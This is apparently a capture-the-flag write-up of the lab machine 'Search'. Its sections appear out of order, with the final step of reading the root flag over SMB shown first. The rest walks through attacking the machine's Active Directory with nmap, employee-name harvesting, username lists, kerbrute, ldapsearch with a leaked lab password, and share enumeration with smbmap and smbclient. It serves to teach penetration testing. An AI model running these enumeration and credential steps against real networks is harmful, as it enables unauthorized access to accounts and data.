  .                                  Dc        0  Mon Dec 20 03:34:49 2021
  ..                                 Dc        0  Mon Dec 20 03:34:49 2021
  3D Objects                        DRc        0  Mon Nov 22 15:21:49 2021
  AppData                           DHc        0  Mon Mar 23 03:07:10 2020
  Application Data                DHSrn        0  Mon Mar 23 03:07:10 2020
  Contacts                          DRc        0  Mon Nov 22 15:21:49 2021
  Cookies                         DHSrn        0  Mon Mar 23 03:07:10 2020
  Desktop                           DRc        0  Mon Nov 22 15:21:49 2021
  Documents                         DRc        0  Mon Nov 22 15:21:50 2021
  Downloads                         DRc        0  Mon Nov 22 15:21:49 2021
  Favorites                         DRc        0  Mon Nov 22 15:21:49 2021
  Links                             DRc        0  Mon Nov 22 15:21:50 2021
  Local Settings                  DHSrn        0  Mon Mar 23 03:07:10 2020
  Music                             DRc        0  Mon Nov 22 15:21:49 2021
  My Documents                    DHSrn        0  Mon Mar 23 03:07:10 2020
  NetHood                         DHSrn        0  Mon Mar 23 03:07:10 2020
  NTUSER.DAT                        AHn   262144  Sat Apr 23 00:56:33 2022
  ntuser.dat.LOG1                   AHS     8192  Mon Mar 23 03:07:10 2020
  ntuser.dat.LOG2                   AHS    40960  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TM.blf    AHS    65536  Mon Mar 23 03:07:11 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  ntuser.ini                        HSc       20  Mon Mar 23 03:07:10 2020
  ntuser.pol                      AHSRc      480  Thu Jul 30 09:21:24 2020
  Pictures                          DRc        0  Mon Nov 22 15:21:49 2021
  Recent                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Saved Games                       DRc        0  Mon Nov 22 15:21:50 2021
  Searches                          DRc        0  Mon Nov 22 15:21:49 2021
  SendTo                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Start Menu                      DHSrn        0  Mon Mar 23 03:07:10 2020
  Templates                       DHSrn        0  Mon Mar 23 03:07:10 2020
  Videos                            DRc        0  Mon Nov 22 15:21:49 2021

		3246079 blocks of size 4096. 409296 blocks available
smb: \Users\Administrator\> ls Desktop\
  .                                 DRc        0  Mon Nov 22 15:21:49 2021
  ..                                DRc        0  Mon Nov 22 15:21:49 2021
  desktop.ini                       AHS      282  Mon Nov 22 15:21:49 2021
  root.txt                          ARc       34  Fri Apr 22 09:32:25 2022

		3246079 blocks of size 4096. 411142 blocks available
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> get root.txt 
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> quit
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat root.txt 
77dd4b********************8a5483

AND we got the root flag!!

PreviousIntelligence NextStreamIO

Last updated 2 years ago

Was this helpful?

Overview

References

Enumeration

As we need to know what is available to us, we need to enumerate the exposed services to get some initial information and then dig deeper. Let's start by finding open ports…

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 -T4 search.htb -oN Search_openPorts.log -oX Search_openPorts.xml
[sudo] password for jxberrios: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:07 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.041s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
8172/tcp  open  unknown
9389/tcp  open  adws
49666/tcp open  unknown
49693/tcp open  unknown
49694/tcp open  unknown
49710/tcp open  unknown
49724/tcp open  unknown
49754/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.97 seconds

…followed by further port scanning:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ PORTS=$(cat Search_openPorts.log | grep -E 'tcp.*open' | cut -d '/' -f 1 | xargs | sed -e 's/ /,/g')
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 search.htb -oN Search_PortScan.log -oX Search_PortScan.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:21 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search &mdash; Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-20 02:20:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| http-methods: 
|_  Potentially risky methods: TRACE
| tls-alpn: 
|_  http/1.1
|_http-title: Search &mdash; Just Testing IIS
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49724/tcp open  msrpc         Microsoft Windows RPC
49754/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-20T02:21:36
|_  start_date: N/A
|_clock-skew: mean: -1m23s, deviation: 0s, median: -1m23s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.96 seconds

From the port scan we have lot of good information to start with. What we know so far is:

Domain: search.htb
Command Name: research

Enumerating HTTP/HTTPS

Inspecting TCP80 leads to a static page and references to jpg files:

Note: Adding the CN research.search.htb to the hosts file.

As both http and https sites reference the same application, we find some “employees” that might come in handy:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ curl -sLkX GET --url "http://search.htb/#team-section" | grep -E '.*<h3>.*<\/h3>' | head -n 8 | tr -s ' ' | sed 's/^\s//' | sed 's/[/<>h3]//g'
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Tompson
Cris Stewart

With these names we can build a list of common usernames based on typical naming conventions. See below if desired.

Username Combination

KLyons
DSantiago
SFrye
KStewart
KSpencer
DSimpson
BTompson
CStewart
K.Lyons
D.Santiago
S.Frye
K.Stewart
K.Spencer
D.Simpson
B.Tompson
C.Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Tompson
Cris.Stewart

As part of our enumeration on HTTP/HTTPS, let's enumerate directories:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ dirb http://research.search.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -w -f

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Apr 22 19:27:21 2022
URL_BASE: http://research.search.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4710                                                          

---- Scanning URL: http://research.search.htb/ ----
==> DIRECTORY: http://research.search.htb/Images/                                 
==> DIRECTORY: http://research.search.htb/certenroll/                             
==> DIRECTORY: http://research.search.htb/css/                                    
==> DIRECTORY: http://research.search.htb/fonts/                                  
==> DIRECTORY: http://research.search.htb/images/                                 
+ http://research.search.htb/index.html (CODE:200|SIZE:2968)                      
==> DIRECTORY: http://research.search.htb/js/                                     
+ http://research.search.htb/staff (CODE:403|SIZE:1233)                           
                                                                                  
---- Entering directory: http://research.search.htb/Images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/certenroll/ ----
                                                                                  
---- Entering directory: http://research.search.htb/css/ ----
                                                                                  
---- Entering directory: http://research.search.htb/fonts/ ----
                                                                                  
---- Entering directory: http://research.search.htb/images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/js/ ----
                                                                                  
-----------------
END_TIME: Fri Apr 22 19:54:26 2022
DOWNLOADED: 32970 - FOUND: 2

Looking suspicious enough to look into this user and what seems to be its password. Given our naming convention first.last, we can compose it as:

Hope Sharp -> hope.sharp
Password: 'IsolationIsKey?'

Enumerating LDAP

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -b "DC=search,DC=htb" -s one       
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope oneLevel
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

We can retrieve the naming contexts but anything else requires authentication. Use ldapsearch against the Users base Object to test credentials:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -D 'SEARCH\hope.sharp' -w 'IsolationIsKey?' -b 'CN=Users,DC=search,DC=htb' 'objectClass=user'   
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=search,DC=htb> with scope subtree
# filter: objectClass=user
# requesting: ALL
#

# Administrator, Users, search.htb
dn: CN=Administrator,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAVaQrAT7+sADQAAAAAABTANBgkqhkiG9w0B
 AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
 QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTEyMzA5WhcNMjEwNDA3MTEyMzA5WjBVMR
 MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
 yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
 ALmINUCLzjvz8M7ZYeAecIw1ZF0dLJDnseKfI3BMM4rxu7G7hJ8kL5HmcxFWINzLWCO5bKNyYtLGq
 H6Cb9FsSezc6tW/z22rXkt5Qho0DgBlgRNvFLhmHonviwk2RPXO3gHcjBL/4WDTMjPi38739CtP6l
 oRPqrEephRE8CRMQUaGDbUTC2Xs1/Z0LPwVdemV8Nwm3O00MdsFMbCWn/hty3Hxo5ZMTqKsnz+Wml
 PqVwdkEKBe1k9tKVD8qpC6cQpIbm3qdobFzaLkHamIf2Bvo+/Uy2OvSOifMw1mGJJwbeLeT1kDsVI
 pP0gGh6ZdiaZSRhIXGE7DqrFISzi3TRRcoECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
 QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
 H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
 HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUar7IemvyH1eMJoKVYsu98hlqNtcwHwYDVR0j
 BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
 y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
 klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
 /Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
 blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
 C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
 MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
 lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
 DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAILhtyleim0/vZoXl
 JMgBxLEeNZ63bsint0+6IvP+yTBA4ISqoGLYIsDyOoYdecpykjyjUrQusxqwJBslyYONQ7YBgEzmW
 Db9vlnqUCVWiN1fEtTHUkYzts0oUORVMOHQqpT4P0ktbrupngFClgw/F8n4LDNw7+QuudaKx7hX/J
 bO61uwS7YZ1ycQPlApAOoxWgY8UsBh0X0aEfwBDTN4/6+1O7ur9HVPx3NkdPNcjmBkm8XmPqhf2nM
 ydESLU+jwZGmrCxFThJFuYLSGpKQzKMeFbVC7NlIx/bDlScKjEZ+0rvxKr/d5d24LIQChXLxLUnWg
 FdrY2mB8twsL2Z5z80=
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAS4VoSkRjxsHQAAAAAABDANBgkqhkiG9w0B
 AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
 QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTExNzEwWhcNMjEwNDA3MTExNzEwWjBVMR
 MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
 yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
 AN63rj3DSVXg22+lcsAoqCNVMCWxRG/hzxsIFZUQY5aWQdno2CyYbY+i/om5J7Q7xjTSqU0u3btbb
 AYmG/yD1WdpaELFmjeJ8fM+Jk74eeAZjO8zzxtCGhPKa9a4XbDw3QVZNm0YIOCrTr+qpO7s/Dhp/Q
 LWvzLD/sVWl/0TzxjT3dmBWTDK5ezYt0lakVu8DhMT/QuTZxlb/NIYD1OqScl4M3xoIJoTDeSgBUg
 K/YdfAOICxrm7CrJLj22WcnocDj+hDvPDW8eh2Z2KJLbbkytNPEEfz3g0MKuUfONvNK6Xq60JfaN4
 +5gfsSFTmfcRqd4qmWGehcM9UVgSOPdnfzECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
 QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
 H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
 HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQU10U6bi0rwCTCoxT09cJR0AbQL1UwHwYDVR0j
 BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
 y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
 klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
 /Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
 blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
 C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
 MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
 lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
 DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAIGN30BMcH57jgTPU
 iy8VNNDZ6ykF4VMke5mrO3W+kOjW0U8AuowVlBIng1HhWGSNgBEvacFlA1sEnC3cTAVag57eH4Ov7
 uRgBtZ3h9AO2CKm1RtvVvqjXLP4wmOk7cTBocV3RwuT+CoDFzPRa+9ZD5HRQMPUgshYgBPz96G8t3
 USFTnI8jePGBF9uDUy19ujpw2gGlh9JkEvCTeR8FNvjPljRsw4DM8sJrOd5RJm6p1NTx/uCodIgGr
 qKgKQMRKLVOQ8l5NMUDXsc1ozclpiiHCH6foanyZWU2ZJ/hacXCMq2B18gwknwAxn6Ai1CEa3PzoV
 YROF/I4JvNfy1XL8DQ=
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20220413105646.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 213062
name: Administrator
objectGUID:: pc4v2f1XX0OmXLqrv/Edgw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132943234160414333
lastLogoff: 0
lastLogon: 132951144927723973
pwdLastSet: 132313451094143670
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 866
sAMAccountName: Administrator
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 132943210066516943
msDS-SupportedEncryptionTypes: 0

# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Guest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20200331141835.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
uSNChanged: 8197
name: Guest
objectGUID:: ulsgEdc6F0mO1JMHdczXCA==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Guest
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101000417.0Z

# krbtgt, Users, search.htb
dn: CN=krbtgt,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141936.0Z
whenChanged: 20211214201649.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
uSNChanged: 180281
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: aZ2LlY6VY0igOk+ajvf3mg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132301379764357878
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101181216.0Z
msDS-SupportedEncryptionTypes: 0

# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tristan Davies
sn: Davies
description: The only Domain Admin allowed, Administrator will soon be disable
 d
givenName: Tristan
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200408163602.0Z
whenChanged: 20220422144632.0Z
displayName: Tristan Davies
uSNCreated: 24817
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 253025
name: Tristan Davies
objectGUID:: BG7UG1fgykOF22w51h8LBw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132406600358324634
lastLogoff: 0
lastLogon: 132406781797503096
pwdLastSet: 132427526509705890
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 4
sAMAccountName: Tristan.Davies
sAMAccountType: 805306368
userPrincipalName: Tristan.Davies@search.htb
lockoutTime: 0
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
dSCorePropagationData: 20220422152132.0Z
dSCorePropagationData: 20220422151632.0Z
dSCorePropagationData: 20220422151132.0Z
dSCorePropagationData: 20220422150632.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132416141844196476

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 4

Along with some users, we can see user certificate information from the Administrator user.

Using Kerbrute and Enum4linux

Using the username list we created from the people found on the web application, we can try and confirm if those are valid users.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ kerbrute userenum --dc search.htb -d search.htb usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/21/22 - Ronnie Flathers @ropnop

2022/04/21 00:55:41 >  Using KDC(s):
2022/04/21 00:55:41 >  	search.htb:88

2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/04/21 00:55:42 >  Done! Tested 24 usernames (3 valid) in 0.374 seconds

This gave us three AD accounts that exist. By using enum4linux, we found some interesting group memberships and other users retrieved through LDAP:

Group: 'Schema Admins' (RID: 518) has member: SEARCH\Administrator
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Tristan.Davies
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Administrator
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Tristan.Davies
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Tristan.Davies

At this point, we could pull more information valuable using Bloodhound and might save us some effort, but we can leave for a later stage so we go through the process.

Gaining Access

Looking specifically at the shares this account has access to:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'hope.sharp' -p 'IsolationIsKey?' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share

There we see there is a share that can be accessed with this credential. Let's take a look:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\hope.sharp'%'IsolationIsKey?'
Try "help" to get a list of possible commands.
smb: \> recurse 
smb: \> ls
  .                                  Dc        0  Fri Apr 22 11:47:28 2022
  ..                                 Dc        0  Fri Apr 22 11:47:28 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
